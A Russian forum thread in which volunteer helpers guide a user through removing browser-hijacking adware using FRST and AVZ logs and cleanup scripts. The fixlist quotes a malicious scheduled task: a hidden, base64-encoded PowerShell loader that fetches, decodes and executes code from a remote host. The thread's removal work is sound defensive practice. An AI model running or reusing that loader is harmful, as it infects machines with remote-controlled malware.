Junior Member
Вес репутации
36
Подмена ссылок, всплывающие окна, сторонняя реклама в браузерах
AVZ не удалось лог сделать , выдает ошибку. Скрин с частью лога прикрепляю.
При открытии любой ссылки из поисковика или любой другой не https подгружается куча всплывающих окон.
Изображения
Вложения
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Boooooo , спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи .
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект .
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание : необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD , Driver MD5 и 90 Days Files .
3. Нажмите кнопку Scan .
4. После окончания сканирования будет создан отчет (FRST.txt ) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt ).
6. Полученные в пп. 4 и 5 логи заархивируйте (в один архив ) и прикрепите к сообщению.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
Junior Member
Вес репутации
36
Вложения
1. Откройте Блокнот и скопируйте в него приведенный ниже текст
Код:
CreateRestorePoint:
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKU\S-1-5-21-1916561639-4039862339-8707676-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://services.eshield.com/general/newhometab.php?hometab=home&partner=11467&guid={551943CA-1D70-446E-AE11-3C19EC60CE73}&i=
SearchScopes: HKU\S-1-5-21-1916561639-4039862339-8707676-1000 -> {A2520505-5E77-499C-B02A-940CF2B0F3E2} URL = hxxp://search.eshield.com/serp?guid={551943CA-1D70-446E-AE11-3C19EC60CE73}&action=default_search&k={searchTerms}
Toolbar: HKU\S-1-5-21-1916561639-4039862339-8707676-1000 -> No Name - {30EF72BD-48F0-48AC-BF3E-FA0996BC3B55} - No File
FF Plugin HKU\S-1-5-21-1916561639-4039862339-8707676-1000: @tnt2npapi.com/Plugin -> C:\Users\Админ\AppData\Local\TNT2\2.0.0.2030\npTNT2.dll [No File]
OPR Extension: (Money Viking) - C:\Users\Админ\AppData\Roaming\Opera Software\Opera Stable\Extensions\jomapmgiopmnohfccaphcpobcihfpebb [2015-12-26]
2016-02-19 17:49 - 2016-02-19 17:49 - 00000000 ____D C:\Users\Все пользователи\e33bb67f-3771-0
2016-02-19 17:49 - 2016-02-19 17:49 - 00000000 ____D C:\Users\Все пользователи\b97c2079
2016-02-19 17:49 - 2016-02-19 17:49 - 00000000 ____D C:\ProgramData\e33bb67f-3771-0
2016-02-19 17:49 - 2016-02-19 17:49 - 00000000 ____D C:\ProgramData\b97c2079
Task: {1016FEC5-9A5E-4CAA-8CE7-35114507597C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {318F4D0D-63A3-4464-825F-41267238CC69} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {473E82D8-5D58-4C37-8661-9BFC63DD8750} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {4BEDAAF4-3A7A-472B-8587-A563027EF841} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {4D92A2D6-361A-418E-BA68-5294F20BEA83} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {565C416A-DDE8-41D7-9551-AA985730BC14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {70D8D65A-29C0-4B13-9186-D64984891572} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {911E78AA-E737-4B97-970F-9B446E83FD6E} - System32\Tasks\{09797847-797F-7F0F-7911-7A097E0D117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAOwAgADsAOwAgACAAIAA7ADsAOwA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAVgBlAHIAYgBvAHMAZQBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAKAGYAdQBuAGMAdABpAG8AbgAgAFkARABSAEQAVQBHAEUAWgBHAFoARwBaAFIATwBVAEEAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAOwB9AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcAAgAC0ATgBhAG0AZQAgACQAbgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsACgB9AAoAYwBhAHQAYwBoAHsAdAByAHkAewBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAIAB9AH0AIAB9AFkARABSAEQAVQBHAEUAWgBHAFoARwBaAFIATwBVAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAWQBEAFIARABVAEcARQBaAEcAWgBHAFoAUgBPAFUAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AcwB2AGMAaABvAHMAdAAuAGUAeABlACIAKQA7AFkARABSAEQAVQBHAEUAWgBHAFoARwBaAFIATwBVAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAB0AGEAcwBrAGUAbgBnAC4AZQB4AGUAIgApADsACgAkAHMAdQByAGwAPQAiAGgAdAB0AHAAOgAvAC8AYgByAGkAZwBoAHQAYwBoAGkAZQBmAC4AYwBvAG0ALwB1AC8APwBhAD0ASABvAEYAYgB0AFEAQQAwADcAbwBzAFIAUQAzAEQARQB6AEEAMwBBAFQAUABHAEcAdwBZADUAMABjADkANgBOAEsAbwBnADMAMABZAHEAawAxAFQAaABwADMAaABxADAAQQBKAHcASgBBAHkASgBEAFAATQBaAG0ARgBTAEgAMgBrAF8AQQBFAFYAawBFAHEAcABTAGoAeABwADUAdgB0AHkAcwBxAEIARwB5AE0AeABTAEwARQBoAGIAZABUAF8AVABVAHQAeQB0ADIAcwA2AEgAdABSAEkAMgBVAE8ATABOAEkANABVAEoAZQBiAGwARABBAGgAQgB1AHoAWABMAFkAVgBUAC0AXwA2AFcAeABGAEgAbQBCAE0AaQBvAHcAcgBlAGEAUgA4AEMAUQBwAFIASAB3AFUAcABFAFcAZwBhAHgAbQB5AHEAMABsAFcATgBGAHMAMQBBAGkANwBUAEoAawB3AEIASQB5AGgATgBNAG4AVwBTAC0AYgBKAEMANQBXAHYAbgBCAHcAMABrADcAcABZADgAWQBfAGUAaABwADgATABJAE4ARABUAEwASwBQADIAcABmAGUAaQA3AEoAbgB1AFUALQA1AEUARQBiAGsAXwA0AEEARgB6AE0AMgA3AHcAMQBwAEcATABjAHMARQBEAEIAYQBYAHIAeQBsAHUAbABGADIAVQBBAGIAVABBAFIAMwBqADYAYQBjAFQAWQB1AGIASgBBAHIASgB1AEwAVQB3AFkAcQBNAFkAMgBYAEwAUwAtAGUARQBmADIARQBNAE4AZwBCAC0ATgBxAGwAdwByAE8ASgBqAGQAcgBWADcAOAB4AHAAbABaAF8ATAAyAFMAaQBNAGUAWQBoADEASQA1ADcATwBHAGYAZgB4AEYAUwBqAFUAMgB3AGsATQAzAEIAaQA1AEYARgBiAGEAYQBiAFIAbgBEAF8AYQBoAEQAUQBTAGMAdQBlAGcAQgBHADAANAA3AEIATwAyAHkASgBNAFYASABXAHMATwBqAGUAagBCAGgAdgAzAHMAYgBzAHoAaABVAEIARQBWAGsAcgBzAHEAVwBSAGkASQBQAGMAbwBhADMAMgB0AFMATABiADcAWABUAGYALQBKAG4ASQBVAEoAegA5AEgANQB4AGkASAAwAHMAdwBwAFEARQBzAEcAXwBvAHMAXwBBAFUAQwA4AGMAdQBHAF8AbwA5AEkANwB2AEEAQwBaAFoASgBIAFEATwBiAHoAcgBfADUAZwBIAEYAQwBYAHcANQA4ADUAegBEADAARQBGAEIASwBDAEEASwBQADUAUABNAFUASwBuAFcAWgBWAEkAWABDAGoAYgBMADMAUgBmAHoATgBoAHgAdwByAHYATgBQADQALQBrAHAAUwBiAHIALQA4AE8AVwByAGgASAB1AEQAcwBnAE8AbAA2AGEANQBsAEcAcwB2AF8AaQAtAEQAXwA3AFcAaQBjAGYAbAByAGIAbABrAFMAVgBsADEAbwBGAE4ALQBPAE8ASgBKAG4AUABqAGMAYwBfAHgAbwBGAGoAXwBOAEQAVABwAFQAVQBkADUARgByAHgAMQBqAEIAYQBjAGgANAAzAGEAaAAzAEoAcQBVAGMAQQB1AGkASwBoAEYAQwB2AFcAQQBNAHIAdABPAC0ATgBNAHEAcABKAGUARABmAFQANwBaAF8AOQBWAG4AaABKAHkANwA2AHgAcABQAGIAWAAxAE8AVABtAHcAQQBrAG0AVwBFAFIARwBzAGEAeQBqADgAMQBpAEgAaQBXAEkASQBsAEoAYQBTADQAVgBiAGEAbwBXAFUASgBMAEoATQBVADIAZAAyAGIATQB4ADQAYwBBAEsARQBLAFIAVgBmAG8AYQBlADgAWABEAGQAQQBqAFUAOABTADAAQgBZAHEAZwA0AFEARgBnAHgAVABuADkAOABBAGwAaQBTAHkAcQBVAHgAXwBzAEoAegA5AFMAOABQAGwAeABzADEAOQBrAFQATQA0ADcAawBQAEcAZgBsAG4AOQA3AHQAcgBlAHMAQwBMADkAWgBHAGwATQBuADQAVQBxAGgATQBtAEgAUQBzAF8ANABGAC0ANwBmAGsAZQBkAGgAcQBvAHoAUQBsAGcAQQBtADkARQBkAHIARAB2AEkAUQBNAEkAZQBiAE8AUwBBAFYAawBYAEsAdwBOAEgAVAA1AE8AUgBiAHgAUABuACYAYwA9ADYAawAtAEoAOAAyAHIASQBMAGUAbABjAEEAXwBzAFkARwB4AFMASQBFAHkANgBLAEoAUQBwADcAZABoAE0AbAA4AGoAeQBQAEcAMABNAHYALQBoAHgARQBfAHUAaQBsAGkAOABiAGwARQBuAGcATQBoAEYARwBUAEIAbQBnAHkANABxAHEALQBqAGkAeQAyAGoAWQA3AEIASgBQADgAQgBmAEEAVwBHADEARwBPAGIASwBfADUASQBEADYATgBFAEYAdABCAC0ANgBVAEIAcQBPADUAbwA2AEUANwBHAF8ATQBrAEMAWABGAEgASABsAFcASwB5AEEAWgBkAEUAQwBRAFMAbwBKAHoAegBJAHUAeQBYAFgAYQBfAGoAMgBiAFcANABXAGkAbgBtAHcARQBGAG0AVABFAGwAUwBZAG8AMgBkAG8AMQBZAFMAMwBiAG4AMgA2AHcANQBYAC0AUgBZAE4AMABqAEgAOQBEAEQAQwB6AHUAMQA5AEUALQBvAEwANQBhAGIAdwBHAHEAaABUAHYAbABrAG4AWABhAFgATwBiAGQALQBSADkANAB1ADgAdwBRAEMAYgBYAEcAaQAzADcAZwBpAHAATQBkAGwAWgB5AFAARABRAEkANgA1AFYAUABuADAARQA4AGsAbABBAGYAQQBrAGgAaQBxAE4AcwBfAGwASQBhAHMAbwA4AFkAawBaAFIAZABLAFMAbQA3AFMARwBOAFcARQBIAE4ARwBrAG4AYQBoAGkAaQAtAHMAdQBDAEsAdAAzAEkAWABqAGgAYgBJAEYAWgBOAE0ATwA4AEkAVQB0AEMAWQBhAE4AQwB0AGUASABZAEQANABCAHkAVgA2AEEAWQBkAGcAaABIAG4AcQA1AFkAeQAxAEcAeQBqAEsAaQA1AG4AQQBjADYANQAzAEgAcQBlAHYAdwBsAC0AOABBAEUAegAyAEUANwA1ADIASgBXAHEAWABFAFoASQB0AHIAYgBaAHIAdQB4AGoAZwB1AE8AQgBDAC0ASQBmADAANgA1AHkAbgBLADUAdgB1AEIAVgBUADMAUABtADQAaAAxAHMATgBRADEANwAwAEoALQBsAE0AcABCAHYAYQBBAGkAVQBsAG8AawBaAE4AWgAwAE8ASABPAEIANQB2ADEATAAtAFIANQBkAHoATgBYADcAaABXADYATgA5AC0ASwBHAGEAOABMAE4AUABZAHcAdgBMAHUAUABwAFMASQAwAHUAbABRAFAALQBkAEkAMABQAEQATABLAEkARgBWAGkATwBTAGIASgBjAHgAUABUAFIAcABIADIAOABvADYAdgAwAF8ALQBFAE4AWgBwAEMAaQBXADYASwBKAHUATgBrAFMANwBqAHEAYwBoAE0AcQBMAFQAdABJADAAVQBGAFYANQAxAGQASwBJAGgAMQBVAEcAMgBQAGwATABhAGoARABrAEsAVwBXAEgAeABhAGwATABYAHYARwBLAGMAdwBWAFEAUABHAG0AZQB2AGIASgB2AFgAQgAtAEUAMABIAGEAagBzADMAZwAzAFQAegBfADEAcQB6AGsAMABOAFIAdwBvAG4AegB5AHMAcQBzADAAZgByAHkAcQByAEYARwBXAE4AVwBUAGkAcgB4AGkAawBhAGwANQBqAGQAdgBKAFQAbwBvAFgAZQByAFYAbQA1AFAAUwB2AGwALQBNAGgATQBnADMASwBsAEYATgByAGsAMABqAEoANgBQAGMAVgBsAFUASwA5AEUAdABrAF8ASgAyADIAUwAwAGEARgBJAHEAYwBWADEAUgBOAGcAYgBkAEUAWABCAGoAcwA2AHIARAAzAHAASABBAHEAYwBZAEMAcwA0AG8ATgBJAF8AZAB3AHoATgBMAHcAYgB6AGEAbQBoAHgAeABHAEYARABCAHkAcQBOAFYAbwBMAFgAZQBmAFAAdABzAGgAcQBoAGUAUABUAFUAVABmADUAYwBkAEsAdwB0AFQAbwAyAGsASgBGAEoAWgB0ADQAbAB6AHQAWABPAHkAYgA2AEoATgB6ADUASgBGAHQAOQAxAFIAVgBkAE4AMwAxAEcAZgBOAG4ARwAtAFkAcwBDAFIAdwBKAEEAeAB3AFAAMAB1AF8AbABxAGUAagBIAHYAVwBmAGQAMwBsAE4AbwBsAGYAaABaAHcAcgBrAFMAawBCAEkAaABVAHUATABYAEQAUgBJAFIAJgByAD0AMwA3ADQANAA4ADMANgAyADQAMQA5ADkANQA1ADUAMQA0ADMANwAiADsAJABzAHQAcwBrAD0AIgB7ADAAOQA3ADkANwA4ADQANwAtADcAOQA3AEYALQA3AEYAMABGAC0ANwA5ADEAMQAtADcAQQAwADkANwBFADAARAAxADEANwBFAAoAfQAiADsAJABwAHIAaQBkAD0AIgBmAGwAbwBhAHQAaQBuAGcAIgA7ACQAaQBuAGkAZAA9ACIANABWAFUAUABRADIAMQBVACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAIAB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABPAEYARgBPAFkARQBEAFAAWQBWAEIAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABEAFUAQwAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0ARABVAEMAKABPAEYARgBPAFkARQBEAFAAWQBWAEIAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewAKAH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {9342C92A-D990-4549-B006-B4E5CA0EE5FD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {B43BD4B8-71B1-46A1-BD0D-5E1510360BEB} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E7F74679-E6D5-49AF-A24E-BC37FB2F95B5} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {E91F54A8-2886-40BB-8F4F-06BC885E7AF0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Reboot:
2. Нажмите Файл – Сохранить как
3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
4. Укажите Тип файла – Все файлы (*.*)
5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt ). Пожалуйста, прикрепите его в следующем сообщении!
Обратите внимание, что компьютер будет перезагружен .
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
Junior Member
Вес репутации
36
Вложения
Junior Member
Вес репутации
36
Проверьте кто-нибудь из знающих Fixlog.txt
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
Junior Member
Вес репутации
36
Проблема вроде бы решена. Признаков нет. С Fixlog.txt все нормально?
Junior Member
Вес репутации
36
Как оказалось проблема не решилась, снова появились всплывающие окна, подмена ссылок. Произошло после того, как KIS обнаружил файл папке карантина FRST и удалил его.
- - - - -Добавлено - - - - -
Новые логи
Вложения
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
Junior Member
Вес репутации
36
Вложения
Junior Member
Вес репутации
36
Удалил. Проблема не решена, по прежнему выскакивает реклама и открываются окна.
Вложения
Вы из Израиля?
Проблема во всех браузерах?
- Повторите логи virusinfo_syscheck.zip и hijackthis.log .
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
Junior Member
Вес репутации
36
Я из России.
Chrom, FireFox на каждой http странице всплывающие окна и реклама с заменой страницы.
IE 11, Opera после десяти минут серфинга проблемы не замечено.
Интернет через коммутатор провайдера, напрямую подключен.
Вложения
- Выполните в АВЗ:
Код:
begin
DeleteFile('C:\WINDOWS\system32\Tasks\cFos\Registration Tasks\Open Browser','64');
DeleteFile('C:\WINDOWS\system32\Tasks\{31DF2E8A-0A47-462E-BB3C-92FB566FD2DC}','64');
DeleteFile('C:\WINDOWS\system32\Tasks\{AF5DD854-2D54-4D31-AD96-435006521256}','64');
DeleteFile('C:\WINDOWS\system32\Tasks\{CFA33FE8-282F-4495-BC05-AAEC448329D8}','64');
DeleteFile('C:\WINDOWS\system32\Tasks\{F9445412-2DF9-4898-B9B6-5210981EC839}','64');
DeleteFile('C:\WINDOWS\system32\Tasks\Opera scheduled Autoupdate 1417265528','64');
end.
- Очистите кеш и куки браузеров
Проверьте.
- Повторите логи virusinfo_syscheck.zip и hijackthis.log .
Junior Member
Вес репутации
36
Вложения
- Выполните в АВЗ:
Код:
begin
ClearQuarantine;
QuarantineFile('C:\WINDOWS\System32\reg.exe','');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6cfb9c5c-138e-4bb3-8a3d-d5383e910e57}','DLLName');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4bcd6cde-777b-48b6-9804-43568e23545d}','DLLName');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{16be69fa-4209-4250-88cb-716cf41954e0}','DLLName');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4d968b55-cac2-4ff5-983f-0a54603781a3}','DLLName');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{BA649533-0AAC-4E04-B9BC-4DBAE0325B12}','DLLName');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C34B2751-1CF4-44F5-9262-C3FC39666591}','DLLName');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{f3ccc681-b74c-4060-9f26-cd84525dca2a}','DLLName');
end.
Перезагрузите компьютер
После перезагрузки:
- Выполните в АВЗ:
Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин " вверху темы.
- Повторите логи virusinfo_syscheck.zip